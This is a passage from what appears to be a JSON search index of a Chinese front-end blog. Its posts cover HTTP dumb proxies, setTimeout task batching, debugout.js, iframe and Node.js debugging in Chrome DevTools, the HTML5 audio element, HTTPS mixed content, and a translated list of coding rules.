\u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我有发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.","title":"哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首"},{"content":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 var everyTimeCreateLines = 80; // 当前行 var currentLine = 0; setTimeout(function renderTable(){ console.time(\u0026#39;wd\u0026#39;); for(var i=currentLine; i\u0026lt;currentLine+everyTimeCreateLines \u0026amp;\u0026amp; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); currentLine = i; if(currentLine \u0026lt; allLines){ setTimeout(renderTable,0); } },0); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 这次异步按批次创建,没有耗时的警告。因为控制了每次代码在50ms内运行。实际上每80行耗时约10ms左右。这就不会引起页面卡顿等问题。\n","permalink":"https://wdd.js.org/posts/2018/02/settimeout-to-splice-big-work/","summary":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.","title":"定时器学习:利用定时器分解耗时任务案例"},{"content":" 我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。\n","permalink":"https://wdd.js.org/posts/2018/02/js-functional-programming/","summary":"我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。","title":"关于JavaScropt函数式编程,我多么希望能早点看到这本书"},{"content":" 本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websoekt推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发区分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部执行行日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 可选配置 ··· // log in real time (forwards to console.log) self.realTimeLoggingOn = true; // insert a timestamp in front of each log self.useTimestamps = false; // store the output using window.localStorage() and continuously add to the same log each session self.useLocalStorage = false; // set to false after you\u0026rsquo;re done debugging to avoid the log eating up memory self.recordLogs = true; // to avoid the log eating up potentially endless memory self.autoTrim = true; // if autoTrim is true, this many most recent lines are saved self.maxLines = 2500; // how many lines tail() will retrieve self.tailNumLines = 100; // filename of log downloaded with downloadLog() self.logFilename = \u0026rsquo;log.txt\u0026rsquo;; // max recursion depth for logged objects self.maxDepth = 25; ···\n5. 项目地址 https://github.com/inorganik/debugout.js\n6. 另外 我自己也模仿debugout.js写了一个日志保存的项目,该项目可以在ie10及以上下载日志。 debugout.js在ie浏览器上下载日志的方式是有问题的。 项目地址:https://github.com/wangduanduan/log4b.git\n","permalink":"https://wdd.js.org/posts/2018/02/save-console-log-as-file/","summary":"本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websoekt推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发区分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部执行行日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 可选配置 ··· // log in real time (forwards to console.","title":"终于找到你!如何将前端console.log的日志保存成文件?"},{"content":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage用传递消息来实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. IE 如图所示是ie11的dev tool点击下来箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)\n","permalink":"https://wdd.js.org/posts/2018/02/debug-code-in-iframe/","summary":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage用传递消息来实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. IE 如图所示是ie11的dev tool点击下来箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)","title":"如何浏览器里调试iframe里层的代码?"},{"content":" 我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; type=\u0026#39;audio/mp3\u0026#39; /\u0026gt; \u0026lt;/audio\u0026gt; 你可以看出他们在Chrome里表现的差异\n关于audio标签支持的音频类型,可以参考Audio#Supported_audio_coding_formats\n3. 常用属性 autoplay: 音频流文件就绪后是否自动播放\npreload: \u0026ldquo;none\u0026rdquo; | \u0026ldquo;metadata\u0026rdquo; | \u0026ldquo;auto\u0026rdquo; | \u0026quot;\u0026quot;\n\u0026ldquo;none\u0026rdquo;: 无需预加载 \u0026ldquo;metadata\u0026rdquo;: 只需要加载元数据,例如音频时长,文件大小等。 \u0026ldquo;auto\u0026rdquo;: 自动优化下载整个流文件 controls: \u0026ldquo;controls\u0026rdquo; | \u0026quot;\u0026quot; 是否需要显示控件\nloop: \u0026ldquo;loop\u0026rdquo; or \u0026quot;\u0026quot; 是否循环播放\nmediagroup: string 多个视频或者音频流是否合并\nsrc: 音频地址\n4. API(重点) load(): 加载资源 play(): 播放 pause(): 暂停 canPlayType(): 询问浏览器以确定是否可以播放给定的MIME类型 buffered():指定文件的缓冲部分的开始和结束时间 5. 常用事件:Media Events(重点) 事件名 何时触发 loadstart 开始加载 progress 正在加载 suspend 用户代理有意无法获取媒体数据,无法获取整个文件 abort 主动终端下载资源并不是由于发生错误 error 获取资源时发生错误 play 开始播放 pause 播放暂停 loadedmetadata 刚获取完元数据 loadeddata 第一次渲染元数据 waiting 等待中 playing 正在播放 canplay 用户代理可以恢复播放媒体数据,但是估计如果现在开始播放,则媒体资源不能以当前播放速率直到其结束呈现,而不必停止进一步缓冲内容。 canplaythrough 用户代理估计,如果现在开始播放,则媒体资源可以以当前播放速率一直呈现到其结束,而不必停止进一步的缓冲。 timeupdate 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变。 ended 播放结束 ratechange 媒体播放速度改变 durationchange 媒体时长改变 volumechange 媒体声音大小改变 6. Audio DOM 属性(重点) 6.1. 只读属性 duration: 媒体时长,数值, 单位s ended: 是否完成播放,布尔值 paused: 是否播放暂停,布尔值 6.2. 其他可读写属性(重点) playbackRate: 播放速度,大多数浏览器支持0.5-4, 1表示正常速度,设置该属性可以修改播放速度 volume:0.0-1.0之间,设置该属性可以修改声音大小 muted: 是否静音, 设置该属性可以静音 currentTime:指定播放位置的秒数 // 你可以使用元素的属性seekable来决定媒体目前能查找的范围。它返回一个你可以查找的TimeRanges 时间对象。 var mediaElement = document.getElementById(\u0026#39;mediaElementID\u0026#39;); mediaElement.seekable.start(); // 返回开始时间 (in seconds) mediaElement.seekable.end(); // 返回结束时间 (in seconds) mediaElement.currentTime = 122; // 设定在 122 seconds mediaElement.played.end(); // 返回浏览器播放的秒数 以下方法可以使音频以2倍速度播放。\n\u0026lt;audio id=\u0026#34;wdd\u0026#34; src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;script\u0026gt; var myAudio = document.getElementById(\u0026#39;wdd\u0026#39;); myAudio.playbackRate = 2; \u0026lt;/script\u0026gt; 7. 常见问题及解决方法 录音无法拖动,播放一端就自动停止: https://wenjs.me/p/about-mp3progress-on-audio 如何隐藏Audio的下载按钮:https://segmentfault.com/a/1190000009737051 想找一个简单的录音播放插件: https://github.com/kolber/audiojs 8. 参考资料 W3C: the-audio-element\nwikipedia: HTML5 Audio\nW3C: HTML/Elements/audio\nNative Audio in the browser\nHTMLMediaElement.playbackRate\n使用 HTML5 音频和视频\n","permalink":"https://wdd.js.org/posts/2018/02/audio-heart-detail/","summary":"我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.","title":"Audio 如果你愿意一层一层剥开我的心"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。\n","permalink":"https://wdd.js.org/posts/2018/02/you-dont-know-https-and-http/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。","title":"可能被遗漏的https与http的知识点"},{"content":"英文好的,直接看原文\nhttps://blog.hospodarets.com/nodejs-debugging-in-chrome-devtools\n1. 要求 Node.js 6.3+ Chrome 55+ 2. 操作步骤 1 打开连接 chrome://flags/#enable-devtools-experiments 2 开启开发者工具实验性功能 3 重启浏览器 4 打开 DevTools Setting -\u0026gt; Experiments tab 5 按6次shift后,隐藏的功能会出现,勾选\u0026quot;Node debugging\u0026quot; 3. 运行程序 必须要有 --inspect\n\u0026gt; node --inspect www Debugger listening on port 9229. Warning: This is an experimental feature and could change at any time. To start debugging, open the following URL in Chrome: chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf 将这个地址粘贴到谷歌浏览器:chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf\n程序后端输出的日志也回输出到谷歌浏览器的console里面,同时也可以在Sources里进行断点调试了。 ","permalink":"https://wdd.js.org/posts/2018/02/debug-nodejs-in-chrome-devtool/","summary":"英文好的,直接看原文\nhttps://blog.hospodarets.com/nodejs-debugging-in-chrome-devtools\n1. 要求 Node.js 6.3+ Chrome 55+ 2. 操作步骤 1 打开连接 chrome://flags/#enable-devtools-experiments 2 开启开发者工具实验性功能 3 重启浏览器 4 打开 DevTools Setting -\u0026gt; Experiments tab 5 按6次shift后,隐藏的功能会出现,勾选\u0026quot;Node debugging\u0026quot; 3. 运行程序 必须要有 --inspect\n\u0026gt; node --inspect www Debugger listening on port 9229. Warning: This is an experimental feature and could change at any time. To start debugging, open the following URL in Chrome: chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf 将这个地址粘贴到谷歌浏览器:chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf\n程序后端输出的日志也回输出到谷歌浏览器的console里面,同时也可以在Sources里进行断点调试了。 ","title":"直接在Chrome DevTools调试Node.js"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编​​写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。 您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。 如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 差异化工作可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。 ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 